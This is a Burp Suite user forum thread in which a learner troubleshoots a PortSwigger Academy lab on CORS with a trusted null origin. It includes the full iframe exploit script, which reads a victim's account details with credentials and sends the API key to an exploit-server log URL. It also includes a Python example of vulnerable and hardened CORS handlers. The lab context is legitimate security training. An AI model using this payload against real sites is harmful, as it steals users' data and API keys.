The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

CORS vulnerability with trusted null origin

Philip | Last updated: Nov 14, 2021 03:12PM UTC

Hi - trying to complete the CORS vulnerability with trusted null origin lab. I have put in the following script to the exploit server using appropriate urls.

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script> var req = new XMLHttpRequest (); req.onload = reqListener; req.open('get','https://acdd1f431f9dee5ac0c80ef5001300f2.web-security-academy.net/my-account/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='https://exploit-ac8d1f471f15ee85c0070e2e01c5003c.web-security-academy.net/exploit/log?key='+encodeURIComponent(this.responseText); }; </script>"></iframe>

I deliver exploit but when I check the logs I only get API keys for wiener and not for administrator, so the API key does not work when I decode and enter it. I have also tried to do the lab with a modified user url omitting the "my-account" part of the url path (https://acdd1f431f9dee5ac0c80ef5001300f2.web-security-academy.net/accountDetails) but still can't get the admin API. Any suggestions? Thanks
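For reference, the server-side side of what this lab exercises, as an added example that is not part of the thread or of PortSwigger's lab code: a handler that reflects any Origin, including the literal `null` that a sandboxed iframe sends, with credentials allowed, next to an exact-match allowlist that never echoes `null` or an unparseable origin. The allowlist entries are constructed hostnames, not the lab's.

```python
from urllib.parse import urlsplit

# Constructed allowlist, stored in canonical scheme://host[:port] form.
ALLOWED_ORIGINS = {"https://app.example.test", "https://admin.example.test:8443"}


def weak_cors_headers(origin):
    """Misconfiguration the lab targets: whatever Origin arrives is reflected and
    credentials are allowed. A sandboxed iframe sends 'Origin: null', so a script
    inside it can read the credentialed response body."""
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def _canonical_origin(origin):
    """Return scheme://host[:port] with lowercase host and default port dropped,
    or None when the value is not a well-formed origin (e.g. 'null', a path)."""
    try:
        parts = urlsplit(origin)
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if parts.path or parts.query or parts.fragment or parts.username or parts.password:
        return None
    host = parts.hostname.lower()
    default = 443 if parts.scheme == "https" else 80
    if port is None or port == default:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


def hardened_cors_headers(origin):
    """Exact-match allowlist: 'null', malformed origins and look-alike hosts
    (app.example.test.attacker.test) get no CORS headers at all, so credentials
    are only ever exposed to an origin the operator listed."""
    if origin is None or origin == "null":
        return {}
    canonical = _canonical_origin(origin)
    if canonical is None or canonical not in ALLOWED_ORIGINS:
        return {}
    return {"Access-Control-Allow-Origin": canonical,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}  # keep caches from serving one origin's ACAO to another
```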

Philip | Last updated: Nov 14, 2021 03:23PM UTC

Update: managed to get it to work with https://acdd1f431f9dee5ac0c80ef5001300f2.web-security-academy.net/accountDetails but when I view exploit I get the iframe with "Resource not found - Academy Exploit Server". Not sure if that should be what we see when viewing exploit. But this is what allowed me to get the admin API from the access log.

Ben, PortSwigger Agent | Last updated: Nov 16, 2021 10:42AM UTC